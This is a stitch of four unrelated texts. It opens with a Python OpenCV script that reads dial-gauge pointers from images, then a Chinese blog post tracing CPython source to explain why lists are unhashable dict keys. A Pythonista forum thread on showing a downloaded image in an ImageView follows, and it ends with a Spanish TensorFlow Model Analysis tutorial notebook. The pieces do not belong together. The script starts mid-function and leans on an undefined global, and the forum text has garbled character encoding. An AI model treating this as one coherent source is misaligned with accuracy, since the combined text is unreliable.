cv.waitKey(show_flag_time[1]) # show picture for x ms (x=0 for keypress)
cv.destroyAllWindows()
def get_img_reduce_size(l_img_name, max_pixel):
'''get image and reduce size to max_pixel'''
mimg = cv.imread(l_img_name) # read the image
if DEBUG:
print('Original image shape: ', mimg.shape)
row, col = mimg.shape[:2] # get number of rows (height), columns (width)
if row >= col and row > max_pixel: # calculate ratio to reduce image
ratio = max_pixel/row
elif col >= row and col > max_pixel:
ratio = max_pixel/col
else:
ratio = 1.0
mimg = cv.resize(mimg, (0, 0), fx=ratio, fy=ratio)
mheight, mwidth = mimg.shape[:2]
if DEBUG:
print('Reduced image shape: ', mheight, mwidth)
mgrey_img = cv.cvtColor(mimg, cv.COLOR_BGR2GRAY) # convert to grey image
return mimg, mgrey_img, mheight, mwidth
def get_circle_and_crop_image(pimg, red_ratio, minrr, maxrr):
''' Reduce image size with red_ratio (needed for second pointer
Getting circles using HoughCircles. Important for a good result are the
two last parameter: minRadius and maxRadius! Adjust to your image. '''
mheight, mwidth = pimg.shape[:2]
new_height = int(mheight*red_ratio)
new_width = int(mwidth*red_ratio)
mx1 = (mwidth - new_width)
my1 = (mheight - new_height)
mimg = pimg[my1:new_height, mx1:new_width]
mgrey_img = cv.cvtColor(mimg, cv.COLOR_BGR2GRAY) # convert to grey image
mgrey_blured_img = cv.medianBlur(mgrey_img, 5)
mheight, mwidth = mgrey_blured_img.shape[:2]
circles = cv.HoughCircles(mgrey_blured_img, cv.HOUGH_GRADIENT, 1, 20, np.array([]), 100, 50,
int(mheight*minrr/2), int(mheight*maxrr/2))
b = circles.shape[1]
if DEBUG:
print('Number of circles: ', b)
mcircles_img = mimg.copy()
mcircle_img = mimg.copy()
for (mx, my, mr) in circles[0, :]:
cv.circle(mcircles_img, (int(mx), int(my)), int(mr), (0, 255, 0), 3)
cv.circle(mcircles_img, (int(mx), int(my)), 2, (0, 255, 0), 3)
mx, my, mr = avg_circles(circles, b) # averaging out nearby circles
cv.circle(mcircle_img, (mx, my), mr, (0, 255, 0), 3)
cv.circle(mcircle_img, (mx, my), 2, (0, 255, 0), 3)
rect_x = (mx - mr) # crop image to circle (x=r, y=r)
rect_y = (my - mr)
cropped_img = mimg[rect_y:(rect_y+2*mr), rect_x:(rect_x+2*mr)]
cropped_circle_img = mcircle_img[rect_y:(rect_y+2*mr), rect_x:(rect_x+2*mr)]
cropped_grey_img = mgrey_img[rect_y:(rect_y+2*mr), rect_x:(rect_x+2*mr)]
mheight, mwidth = cropped_circle_img.shape[:2]
if DEBUG:
print('Reduced image shape: ', mheight, mwidth)
return mr, mr, mr, mcircles_img, cropped_img, cropped_circle_img, \
cropped_grey_img
def get_pointer(px, py, pimg, pgrey_img, p1_b_low, p1_b_up, p2_b_low, p2_b_up):
''' Create a threshhold image to get lines using HoughLinesP. '''
THRESH = 100 # test which threshhold function performs best
MAX_VALUE = 180
MIN_LINE_LENGTH = 100
MAX_LINE_GAP = 10
mgrey_img = cv.medianBlur(pgrey_img, 5)
threshhold_img = cv.threshold(mgrey_img, THRESH, MAX_VALUE, cv.THRESH_BINARY_INV)[1]
lines = cv.HoughLinesP(image=threshhold_img, rho=3, theta=np.pi / 180, threshold=100,
minLineLength=MIN_LINE_LENGTH, maxLineGap=MAX_LINE_GAP)
mlines_img = pimg.copy()
mline_img = pimg.copy()
for line in lines: # create image with lines
mx1, my1, mx2, my2 = line[0]
cv.line(mlines_img, (mx1, my1), (mx2, my2), (0, 255, 0), 2)
p1_b_low = 0 # how close the line (P1) should be from the center
p1_b_up = 0.3
p2_b_low = 0.7 # how close P2 should be to the outside of the gauge
p2_b_up = 0.9
mx1, my1, mx2, my2 = calculate_pointer(px, py, lines, p1_b_low, p1_b_up,
p2_b_low, p2_b_up)
cv.line(mline_img, (mx1, my1), (mx2, my2), (0, 255, 0), 2) # create image w line
return mx1, my1, mx2, my2, threshhold_img, mlines_img, mline_img
def calculate_pointer(px, py, plines, p1_b_low, p1_b_up, p2_b_low, p2_b_up):
'''calculate the pointer'''
final_line_list = []
for i, pline in enumerate(plines):
for mx1, my1, mx2, my2 in pline:
diff1 = dist_2_pts(px, py, mx1, my1) # x, y is center of circle
diff2 = dist_2_pts(px, py, mx2, my2) # x, y is center of circle
if diff1 > diff2: # set diff1 to be the smaller (closest to center)
diff1, diff2 = diff2, diff1 # of the two,makes the math easier
if (p1_b_low*r < diff1 < p1_b_up*r) and \
(p2_b_low*r < diff2 < p2_b_up*r): # check if in acceptable range
final_line_list.append([mx1, my1, mx2, my2]) # add to final list
try:
mx1 = final_line_list[0][0]
my1 = final_line_list[0][1]
mx2 = final_line_list[0][2]
my2 = final_line_list[0][3]
except IndexError:
print("\nWrong matching line found? recheck this part of code!\n")
return mx1, my1, mx2, my2
def get_red(pimg):
'''filter the red channel'''
img_hsv = cv.cvtColor(pimg, cv.COLOR_BGR2HSV)
red_min = np.array([0, 60, 0])
red_max = np.array([10, 255, 255])
mask = cv.inRange(img_hsv, red_min, red_max)
return ~mask # return inverted image
def calculate_angle_and_value(px, py, px1, py1, px2, py2):
'''calculate the angle and value'''
dist_pt0 = dist_2_pts(px, py, px1, py1)
dist_pt1 = dist_2_pts(px, py, px2, py2)
if dist_pt0 > dist_pt1:
xlen = px1 - px
ylen = py - py1
else:
xlen = px2 - px
ylen = py - py2
if xlen == 0:
xlen = 0.0000000000000000001
res = np.arctan(np.divide(float(abs(ylen)), float(abs(xlen)))) # arc-tan
res = np.rad2deg(res)
if DEBUG:
print("res", res)
print("xlen, ylen", xlen, ylen)
if xlen < 0 and ylen > 0: # quadrant 4
final_angle = res + 270
if xlen > 0 and ylen > 0: # quadrant 1
final_angle = 90 - res
if xlen > 0 and ylen < 0: # quadrant 2
final_angle = 90 + res
if xlen < 0 and ylen < 0: # quadrant 3
final_angle = 270 - res
value = final_angle/360*100
return final_angle, value
# flags and times in ms to show images
flag = {"reduced":(0, 500), "grey":(0, 500), "circles":(0, 500),
"circle":(0, 500), "threshhold":(0, 500), "lines":(0, 500),
"line":(1, 500), "circles_2":(0, 500), "circle_2":(0, 1500),
"grey_2":(0, 5000), "threshhold_2":(0, 200), "lines_2":(0, 500),
"line_2":(1, 500)}
os.chdir(DIR_NAME_IMAGES) # change directory
img_list = glob.glob('*.jpg') # get list with jpg images
img_list.extend(glob.glob('*.png')) # and png images
img_list.sort()
if img_list == []:
print("error: no images!")
data_saved = dict.fromkeys(img_list, 0) # create directory from list
print(data_saved)
for img_name in img_list:
print(img_name, end='')
img, grey_img, height, width = get_img_reduce_size(img_name, MAX_PIXEL)
show_image(img, flag["reduced"])
x, y, r, circles_img, img, circle_img, grey_img = \
get_circle_and_crop_image(img, 1, MIN_RADIUS_RATIO_1,
MAX_RADIUS_RATIO_1)
show_image(grey_img, flag["grey"])
show_image(circles_img, flag["circles"])
show_image(circle_img, flag["circle"])
x1, y1, x2, y2, threshhold_image, lines_img, line_img = \
get_pointer(r, r, circle_img, grey_img, L1_P1_LOW, L1_P1_UP, L1_P2_LOW,
L1_P2_UP)
show_image(threshhold_image, flag["threshhold"])
show_image(lines_img, flag["lines"])
show_image(line_img, flag["line"])
# cv.imwrite("first_pointer.jpg",line_img)
final_angle_1, value_1 = calculate_angle_and_value(x, y, x1, y1, x2, y2)
x, y, r, circles_img, img, circle_img, grey_img = \
get_circle_and_crop_image(img, 0.77, MIN_RADIUS_RATIO_2,
MAX_RADIUS_RATIO_2)
show_image(circles_img, flag["circles_2"])
show_image(circle_img, flag["circle_2"])
grey_img = get_red(circle_img) # to eliminate black pointer
show_image(grey_img, flag["grey_2"])
show_image(grey_img, flag["circle_2"])
x1, y1, x2, y2, threshhold_image, lines_img, line_img = \
get_pointer(r, r, img, grey_img, L2_P1_LOW, L2_P1_UP, L2_P2_LOW,
L2_P2_UP)
show_image(threshhold_image, flag["threshhold_2"])
show_image(lines_img, flag["lines_2"])
show_image(line_img, flag["line_2"])
# cv.imwrite("second_pointer.jpg",line_img)
final_angle_2, value_2 = calculate_angle_and_value(x, y, x1, y1, x2, y2)
if DEBUG:
print(final_angle_1, value_1)
print(final_angle_2, value_2)
result = round((int(value_2/2) + value_1/100)*10, 4)
print("\tWe are reading: ", result, "µm\n")
data_saved[img_name] = result
if DEBUG:
print(data_saved)
df = pd.DataFrame(data_saved, index=[0]) # pandas dataframe
df.to_csv("my_data.csv", index=False) # save data to csv file
|
云栖号资讯小哥 2020-04-21 485浏览量
云栖号资讯:【点击查看更多行业资讯】
在这里您可以找到不同行业的第一手的上云资讯,还在等什么,快来!
一条面试题
本文源自一条最常见的python面试题:
问:list对象能不能做dict的key?tuple呢?
答:不能,因为list是Mutable类型,不能作为dict的key。而tuple是Immutable类型,可以作为dict的key。
咱们做个实验,从dict的赋值代码抛错来感受一下上面的答案:
>>> l=[1,2,3]
>>> d[l]=123
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unhashable type: 'list'
抛错已经说明白了,因为list是unhashable类型,所以能否hashable就是关键点,再来看list与tuple之间在hashable上的区别:
mappingproxy({'__repr__': <slot wrapper '__repr__' of 'list' objects>, '__hash__': None, ...})
>>> tuple.__dict__
mappingproxy({'__repr__': <slot wrapper '__repr__' of 'tuple' objects>, '__hash__': <slot wrapper '__hash__' of 'tuple' objects>, ...})
这里注意到魔法方法__hash__,在list类型中__hash__实现为None,而tuple持有对应的实现。我们大胆猜测一下,tuple之所以hashable是因为实现了__hash__,再做个验证:
>>> l.__hash__()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object is not callable
>>> t=(1,2,3)
>>> t.__hash__() # 从输出的形式来看,这很可能就是对象的hash值
2528502973977326415
这样子的黑盒试验终究是没办法让人放心,难道真的只是因为__hash__方法的实现与否吗?尝试看list.__hash__和tuple.__hash__的源码,由于函数是由python解释器直接实现,所以无法得到更进一步的结论。为了整明白这个问题,这里拿官网下载python 3.8.2 的CPython源码继续深入探究。我们有两种思路:
定位抛错文案
显然第二种反推思路效率会更高一些(实际上第一种思路是不通的,因为dict.__setitem__下面就是C源码,在python层没法得到更多信息),通过全局搜索unhashable type这个文案定位到两处python的C源码,代码如下:
static Py_hash_t PyCData_nohash(PyObject *self)
{
PyErr_SetString(PyExc_TypeError, "unhashable type");
return -1;
}
// ******************************分割线****************************** //
// 文件位置:Objects/object.c
Py_hash_t PyObject_HashNotImplemented(PyObject *v)
{
PyErr_Format(PyExc_TypeError, "unhashable type: '%.200s'",
Py_TYPE(v)->tp_name);
return -1;
}
很容易就可以判断源代码是Objects/object.c文件的实现,因为看unhashable type文案后面还跟有python对象的类型名,这样才可能打印出完整的抛错信息:
至此,我们知道了PyObject_HashNotImplemented()函数就是dict在赋值操作时,key为Mutable类型导致抛错的源头,接着只要跟踪这个函数在哪里被调用就可以知道dict具体判断key是否hashable的逻辑了。实际上,函数名PyObject_HashNotImplemented给了很多信息,隐约告诉我们,答案很可能就是一开始的推测——__hash__没有实现。
根据调用链逐步往上摸
顺腾摸瓜,寻找`PyObject_HashNotImplemented()函数被调用的地方,源码中有很多地方都有调用,但这个函数引起了我的注意,它的实现中带有对类型的hash函数存在与否的判断逻辑,代码如下:
Py_hash_t PyObject_Hash(PyObject *v)
{
PyTypeObject *tp = Py_TYPE(v);
if (tp->tp_hash != NULL)
return (*tp->tp_hash)(v);
/* To keep to the general practice that inheriting
* solely from object in C code should work without
* an explicit call to PyType_Ready, we implicitly call
* PyType_Ready here and then check the tp_hash slot again
*/
if (tp->tp_dict == NULL) {
if (PyType_Ready(tp) < 0)
return -1;
if (tp->tp_hash != NULL)
return (*tp->tp_hash)(v);
}
// 备注:如果tp_hash为NULL,就会调用PyObject_HashNotImplemented导致抛错
/* Otherwise, the object can't be hashed */
return PyObject_HashNotImplemented(v);
}
ok,咱们继续寻找PyObject_Hash()被调用的地方,感觉离真相已经不远了,同样,整个源码中存在大量对它的调用,有很多C文件从名字上一眼就能识别出跟dict类型不相关,最终这个特殊的C文件名和函数名吸引了我,简直就是明明白白告诉我,这里就是dict的C实现😂,代码如下:
int PyDict_SetItem(PyObject *op, PyObject *key, PyObject *value)
{
PyDictObject *mp;
Py_hash_t hash;
if (!PyDict_Check(op)) {
PyErr_BadInternalCall();
return -1;
}
assert(key);
assert(value);
mp = (PyDictObject *)op;
if (!PyUnicode_CheckExact(key) ||
(hash = ((PyASCIIObject *) key)->hash) == -1)
{
// 备注:获取key的hash函数,如果hash函数为NULL(参考 PyObject_Hash 的实现),则返回 -1(同时抛出类型错误)
hash = PyObject_Hash(key);
if (hash == -1)
return -1;
}
if (mp->ma_keys == Py_EMPTY_KEYS) {
return insert_to_emptydict(mp, key, hash, value);
}
/* insertdict() handles any resizing that might be necessary */
return insertdict(mp, key, hash, value);
}
其实到了这里已经算真相大白了,已经找到dict的set函数C实现了,里面有判断key是否可hash的逻辑,如果key不可hash则向上返回-1。不过本着打破砂锅问到底的心态,我们来看看这个PyDict_SetItem()究竟会在哪里被调用吧🤔。
// 为了阅读的方便,下面的变量、函数摆放的前后顺序做了调整
// 1.跟踪PyDict_SetItem,这里封装dict赋值与删值的,对外暴露单一入口
static int dict_ass_sub(PyDictObject *mp, PyObject *v, PyObject *w)
{
if (w == NULL)
return PyDict_DelItem((PyObject *)mp, v);
else
return PyDict_SetItem((PyObject *)mp, v, w);
}
// 2.跟踪dict_ass_sub,这是保存dict函数指针的数组
static PyMappingMethods dict_as_mapping = {
(lenfunc)dict_length, /*mp_length*/
(binaryfunc)dict_subscript, /*mp_subscript*/
(objobjargproc)dict_ass_sub, /*mp_ass_subscript*/
};
// 3.跟踪dict_as_mapping,最终发现PyDict_Type里存了这个数组变量
PyTypeObject PyDict_Type = {
PyVarObject_HEAD_INIT(&PyType_Type, 0)
"dict",
// ...
&dict_as_mapping, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
// ...
dict_new, /* tp_new */
PyObject_GC_Del, /* tp_free */
};
// 4.顺带再确认PyDict_Type被调用的地方,dict_new函数应该就是python dict分配内存时的调用,至此整个追溯过程就结束了
static PyObject *
dict_new(PyTypeObject *type, PyObject *args, PyObject *kwds)
{
PyObject *self;
PyDictObject *d;
// 为dict类型分配内存空间
assert(type != NULL && type->tp_alloc != NULL);
self = type->tp_alloc(type, 0);
if (self == NULL)
return NULL;
d = (PyDictObject *)self;
/* The object has been implicitly tracked by tp_alloc */
if (type == &PyDict_Type)
_PyObject_GC_UNTRACK(d);
d->ma_used = 0;
d->ma_version_tag = DICT_NEXT_VERSION();
d->ma_keys = new_keys_object(PyDict_MINSIZE);
if (d->ma_keys == NULL) {
Py_DECREF(self);
return NULL;
}
ASSERT_CONSISTENT(d);
return self;
}
另外再找了一下,在文件Objects/odictobject.c下发现了这样的注释说明:
虽然odictobject.c与dictobject.c是两种不同用处的dict的实现,但讲道理两种实现对外的api应该接近一致,所以上面的注释侧面说明了dict的赋值函数就是PyDict_SetItem。
推断验证
上面的过程让我们明确了在dict赋值key时会判断是否实现hash函数,我们还可以在list和tuple的角度验证一下。list是Mutable类型,它不实现hash函数,tp_hash指向函数PyObject_HashNotImplemented;tuple是Immutable类型,它实现了hash函数,tp_hash指向对应的hash函数。代码如下,结果符合预期:
PyVarObject_HEAD_INIT(&PyType_Type, 0)
"tuple",
// ...
(hashfunc)tuplehash, /* tp_hash */
// ...
};
PyVarObject_HEAD_INIT(&PyType_Type, 0)
"list",
// ...
PyObject_HashNotImplemented, /* tp_hash */
// ...
};
总结
咱们追了好阵子源码,该总结一下了。
原问题:为什么dict的key不能是list?
引申问题:为什么dict的key不能是可变类型,可变与不可变类型的区别是啥?
结论:通过追溯CPython源码,发现对dict赋值时会调用PyDict_SetItem检查key对象是否实现hash函数,如果没实现hash函数则抛错并提示类型unhashable(通过函数指针是否为NULL来判断是否实现hash函数)。这里还引出了Mutable与Immutable类型,但本文暂未确定两者除了hash函数外还有无更多区别。
【云栖号在线课堂】每天都有产品技术专家分享!
课程地址:https://yqh.aliyun.com/live
立即加入社群,与专家面对面,及时了解课程最新动态!
【云栖号在线课堂 社群】https://c.tb.cn/F3.Z8gvnK
原文发布时间:2020-04-21
本文作者:枉信焕
本文来自:“掘金”,了解相关信息可以关注“掘金”
集结各类场景实战经验,助你开发运维畅行无忧
|
How to load an image into image view?
Been trying to get an idea of mine working. I made a script to download galleries, and Iâm trying to set the image view after the image has been downloaded.
But for some reason what I did below doesnât do anything. Could someone tell me what Iâm doing wrong?
import ui,requests,Image
from io import BytesIO
Image_url =“some image urlâ€
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view = ui.ImageView()
Img_view.frame() = testview.frame()
testview.add_subview(img_view)
testview.present()
Img_view.image= ui.Image.from_data(image.tobytes())
AceNinjaFire
Nvm I think I figured it out, it has to be a bytes-like object. I just have to figure out how to get image.tobytes() to byte-like and not bytes
stephen
@AceNinjaFire said:
import ui,requests,Image
from io import BytesIO
Image_url =âsome image urlâ
image_data = BytesIO(requests.get(image_url).content)
image = Image.open(image_data)
w,h = ui.get_screen_size()
testview = ui.View()
testview.frame = (0,0,w,h)
Img_view
why not use ui.ImageView.load_from_url(URL)
stephen
@AceNinjaFire
or better yet
import urllib.request, ui
URL = 'https://i.imgur.com/qaAHDac.png'
with urllib.request.urlopen(URL) as url:
with open('temp.jpg', 'wb') as f:
f.write(url.read())
iv=ui.ImageView(image=ui.Image.named('temp.jpg')).present('sheets')
ccc
import io, requests, ui
url = "https://www.python.org/static/community_logos/python-powered-w-200x80.png"
with io.BytesIO(requests.get(url).content) as image_data:
image = ui.Image.from_data(image_data.getvalue())
ui.ImageView(image=image).present()
If you are dealing with lots of images or large images in Pythonista then it is super important to use the
withblock to automate the close of the io.BytesIO and give the garbage collector the opportunity to reclaim the bytes and avoid out-of-memory crashes.ccc
Shiiiiit sorry lol I had not realized that anyone had replied. I knew I could do that from the beginning, I was just trying to go from jpeg/image object straight to ui.Image/Ui.ImageView.
I ended up just making a list from each requests.get().content and using that.
I was just trying to swim up river to see if I could do it I guess lol.
Ah thank you lol, I got as far as image_data = BytesIO(requests.get().content)
I never thought about using the Context Manager and putting the â.getvalue()â on the image_data. Lol I appreciate the help!
AceNinjaFire
stephen
no problem and dont forget that
ui.Image.from_data()has two arguments.dataandscale
the second (optional) is for Retina Scaling2:1or3:1usually2:1and you would pass2for scale.ui.Image.from_data(image_data.getvalue(), 2)
Caitlins
This post is deleted!last edited by
|
Un ejemplo de un componente clave de TensorFlow Extended (TFX)
TensorFlow Model Analysis (TFMA) es una biblioteca para realizar la evaluación del modelo en diferentes segmentos de datos. TFMA realiza sus cálculos de manera distribuida sobre grandes cantidades de datos utilizando Apache Beam .
Este cuaderno de ejemplo de colab ilustra cómo se puede utilizar TFMA para investigar y visualizar el rendimiento de un modelo con respecto a las características del conjunto de datos. Usaremos un modelo que entrenamos anteriormente, ¡y ahora puedes jugar con los resultados! El modelo que entrenamos fue para el ejemplo de taxi de Chicago , que utiliza el conjunto de datos de viajes en taxi publicado por la ciudad de Chicago. Explore el conjunto de datos completo en la IU de BigQuery .
Como modelador y desarrollador, piense en cómo se utilizan estos datos y los posibles beneficios y daños que pueden causar las predicciones de un modelo. Un modelo como este podría reforzar los prejuicios y disparidades sociales. ¿Es una característica relevante para el problema que desea resolver o introducirá sesgos? Para obtener más información, lea acerca de la equidad del AA .
Las columnas del conjunto de datos son:
pickup_community_area tarifa trip_start_month
trip_start_hour trip_start_day trip_start_timestamp
pickup_latitude pickup_longitude dropoff_latitude
dropoff_longitude trip_miles pickup_census_tract
dropoff_census_tract tipo de pago empresa
trip_seconds dropoff_community_area consejos
Instalar extensiones de Jupyter
jupyter nbextension enable --py widgetsnbextension --sys-prefix
jupyter nbextension install --py --symlink tensorflow_model_analysis --sys-prefix
jupyter nbextension enable --py tensorflow_model_analysis --sys-prefix
Instalar TensorFlow Model Analysis (TFMA)
Esto atraerá todas las dependencias y tomará un minuto.
Tenga en cuenta que para asegurarse de que todas las dependencias estén instaladas correctamente, es posible que deba volver a ejecutar este paso de instalación varias veces antes de que no haya errores.
# This setup was tested with TF 2.3 and TFMA 0.24 (using colab), but it should
# also work with the latest release.
import sys
# Confirm that we're using Python 3
assert sys.version_info.major==3, 'This notebook must be run using Python 3.'
print('Installing TensorFlow')
import tensorflow as tf
print('TF version: {}'.format(tf.__version__))
print('Installing Tensorflow Model Analysis and Dependencies')
!pip install -q tensorflow_model_analysis
import apache_beam as beam
print('Beam version: {}'.format(beam.__version__))
import tensorflow_model_analysis as tfma
print('TFMA version: {}'.format(tfma.__version__))
Installing TensorFlow TF version: 2.3.1 Installing Tensorflow Model Analysis and Dependencies ERROR: After October 2020 you may experience errors when installing or updating packages. This is because pip will change the way that it resolves dependency conflicts. We recommend you use --use-feature=2020-resolver to test your packages with the new resolver before it becomes the default. google-api-python-client 1.12.3 requires httplib2<1dev,>=0.15.0, but you'll have httplib2 0.9.2 which is incompatible. Beam version: 2.24.0 TFMA version: 0.24.3
Cargar los archivos
Descargaremos un archivo tar que tiene todo lo que necesitamos. Eso incluye:
Conjuntos de datos de capacitación y evaluación
Esquema de datos
Entrenamiento y servicio de modelos guardados (keras y estimador) y eval modelos guardados (estimador).
# Download the tar file from GCP and extract it
import io, os, tempfile
TAR_NAME = 'saved_models-2.2'
BASE_DIR = tempfile.mkdtemp()
DATA_DIR = os.path.join(BASE_DIR, TAR_NAME, 'data')
MODELS_DIR = os.path.join(BASE_DIR, TAR_NAME, 'models')
SCHEMA = os.path.join(BASE_DIR, TAR_NAME, 'schema.pbtxt')
OUTPUT_DIR = os.path.join(BASE_DIR, 'output')
!curl -O https://storage.googleapis.com/artifacts.tfx-oss-public.appspot.com/datasets/{TAR_NAME}.tar
!tar xf {TAR_NAME}.tar
!mv {TAR_NAME} {BASE_DIR}
!rm {TAR_NAME}.tar
print("Here's what we downloaded:")
!ls -R {BASE_DIR}
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 6800k 100 6800k 0 0 25.4M 0 --:--:-- --:--:-- --:--:-- 25.3M Here's what we downloaded: /tmp/tmpj6t03cp6: saved_models-2.2 /tmp/tmpj6t03cp6/saved_models-2.2: data models schema.pbtxt /tmp/tmpj6t03cp6/saved_models-2.2/data: eval train /tmp/tmpj6t03cp6/saved_models-2.2/data/eval: data.csv /tmp/tmpj6t03cp6/saved_models-2.2/data/train: data.csv /tmp/tmpj6t03cp6/saved_models-2.2/models: estimator keras /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator: eval_model_dir serving_model_dir /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir: 1591221811 /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811: saved_model.pb tmp.pbtxt variables /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/eval_model_dir/1591221811/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir: checkpoint eval_chicago-taxi-eval events.out.tfevents.1591221780.my-pipeline-b57vp-237544850 export graph.pbtxt model.ckpt-100.data-00000-of-00001 model.ckpt-100.index model.ckpt-100.meta /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/eval_chicago-taxi-eval: events.out.tfevents.1591221799.my-pipeline-b57vp-237544850 /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export: chicago-taxi /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export/chicago-taxi: 1591221801 /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export/chicago-taxi/1591221801: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/estimator/serving_model_dir/export/chicago-taxi/1591221801/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/keras: 0 1 2 /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/0: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/0/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/1: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/1/variables: variables.data-00000-of-00001 variables.index /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/2: saved_model.pb variables /tmp/tmpj6t03cp6/saved_models-2.2/models/keras/2/variables: variables.data-00000-of-00001 variables.index
Analizar el esquema
Entre las cosas que descargamos estaba un esquema para nuestros datos que fue creado por TensorFlow Data Validation . Analicemos eso ahora para que podamos usarlo con TFMA.
import tensorflow as tf
from google.protobuf import text_format
from tensorflow.python.lib.io import file_io
from tensorflow_metadata.proto.v0 import schema_pb2
from tensorflow.core.example import example_pb2
schema = schema_pb2.Schema()
contents = file_io.read_file_to_string(SCHEMA)
schema = text_format.Parse(contents, schema)
Utilice el esquema para crear TFRecords
Necesitamos dar acceso a TFMA a nuestro conjunto de datos, así que creemos un archivo TFRecords. Podemos usar nuestro esquema para crearlo, ya que nos da el tipo correcto para cada característica.
import csv
datafile = os.path.join(DATA_DIR, 'eval', 'data.csv')
reader = csv.DictReader(open(datafile, 'r'))
examples = []
for line in reader:
example = example_pb2.Example()
for feature in schema.feature:
key = feature.name
if feature.type == schema_pb2.FLOAT:
example.features.feature[key].float_list.value[:] = (
[float(line[key])] if len(line[key]) > 0 else [])
elif feature.type == schema_pb2.INT:
example.features.feature[key].int64_list.value[:] = (
[int(line[key])] if len(line[key]) > 0 else [])
elif feature.type == schema_pb2.BYTES:
example.features.feature[key].bytes_list.value[:] = (
[line[key].encode('utf8')] if len(line[key]) > 0 else [])
# Add a new column 'big_tipper' that indicates if tips was > 20% of the fare.
# TODO(b/157064428): Remove after label transformation is supported for Keras.
big_tipper = float(line['tips']) > float(line['fare']) * 0.2
example.features.feature['big_tipper'].float_list.value[:] = [big_tipper]
examples.append(example)
tfrecord_file = os.path.join(BASE_DIR, 'train_data.rio')
with tf.io.TFRecordWriter(tfrecord_file) as writer:
for example in examples:
writer.write(example.SerializeToString())
!ls {tfrecord_file}
/tmp/tmpj6t03cp6/train_data.rio
Configurar y ejecutar TFMA
TFMA admite varios tipos de modelos diferentes, incluidos modelos TF keras, modelos basados en API de firma TF2 genéricas, así como modelos basados en estimadores TF. La guía get_started tiene la lista completa de tipos de modelos admitidos y las restricciones. Para este ejemplo, vamos a mostrar cómo configurar un modelo basado en Keras, así como un modelo basado en estimador que se guardó como un EvalSavedModel . Consulte las preguntas frecuentes para ver ejemplos de otras configuraciones.
TFMA proporciona soporte para calcular métricas que se utilizaron en el momento del entrenamiento (es decir, métricas integradas), así como métricas definidas después de que el modelo se guardó como parte de los ajustes de configuración de TFMA. Para nuestra configuración de keras, demostraremos cómo agregar nuestras métricas y gráficos manualmente como parte de nuestra configuración (consulte la guía de métricas para obtener información sobre las métricas y gráficos compatibles). Para la configuración del estimador usaremos las métricas integradas que se guardaron con el modelo. Nuestras configuraciones también incluyen una serie de especificaciones de corte que se analizan con más detalle en las siguientes secciones.
Después de crear un tfma.EvalConfig y tfma.EvalSharedModel , podemos ejecutar TFMA usando tfma.run_model_analysis . Esto creará un tfma.EvalResult que podremos usar más adelante para representar nuestras métricas y gráficos.
Keras
import tensorflow_model_analysis as tfma
# Setup tfma.EvalConfig settings
keras_eval_config = text_format.Parse("""
## Model information
model_specs {
# For keras (and serving models) we need to add a `label_key`.
label_key: "big_tipper"
}
## Post training metric information. These will be merged with any built-in
## metrics from training.
metrics_specs {
metrics { class_name: "ExampleCount" }
metrics { class_name: "BinaryAccuracy" }
metrics { class_name: "BinaryCrossentropy" }
metrics { class_name: "AUC" }
metrics { class_name: "AUCPrecisionRecall" }
metrics { class_name: "Precision" }
metrics { class_name: "Recall" }
metrics { class_name: "MeanLabel" }
metrics { class_name: "MeanPrediction" }
metrics { class_name: "Calibration" }
metrics { class_name: "CalibrationPlot" }
metrics { class_name: "ConfusionMatrixPlot" }
# ... add additional metrics and plots ...
}
## Slicing information
slicing_specs {} # overall slice
slicing_specs {
feature_keys: ["trip_start_hour"]
}
slicing_specs {
feature_keys: ["trip_start_day"]
}
slicing_specs {
feature_values: {
key: "trip_start_month"
value: "1"
}
}
slicing_specs {
feature_keys: ["trip_start_hour", "trip_start_day"]
}
""", tfma.EvalConfig())
# Create a tfma.EvalSharedModel that points at our keras model.
keras_model_path = os.path.join(MODELS_DIR, 'keras', '2')
keras_eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=keras_model_path,
eval_config=keras_eval_config)
keras_output_path = os.path.join(OUTPUT_DIR, 'keras')
# Run TFMA
keras_eval_result = tfma.run_model_analysis(
eval_shared_model=keras_eval_shared_model,
eval_config=keras_eval_config,
data_location=tfrecord_file,
output_path=keras_output_path)
WARNING:absl:Tensorflow version (2.3.1) found. Note that TFMA support for TF 2.0 is currently in beta WARNING:apache_beam.runners.interactive.interactive_environment:Dependencies required for Interactive Beam PCollection visualization are not available, please use: `pip install apache-beam[interactive]` to install necessary dependencies to enable all data visualization features. Warning:apache_beam.io.tfrecordio:Couldn't find python-snappy so the implementation of _TFRecordUtil._masked_crc32c is not as fast as it could be. Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/writers/metrics_plots_and_validations_writer.py:70: tf_record_iterator (from tensorflow.python.lib.io.tf_record) is deprecated and will be removed in a future version. Instructions for updating: Use eager execution and: `tf.data.TFRecordDataset(path)` Warning:tensorflow:From /tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow_model_analysis/writers/metrics_plots_and_validations_writer.py:70: tf_record_iterator (from tensorflow.python.lib.io.tf_record) is deprecated and will be removed in a future version. 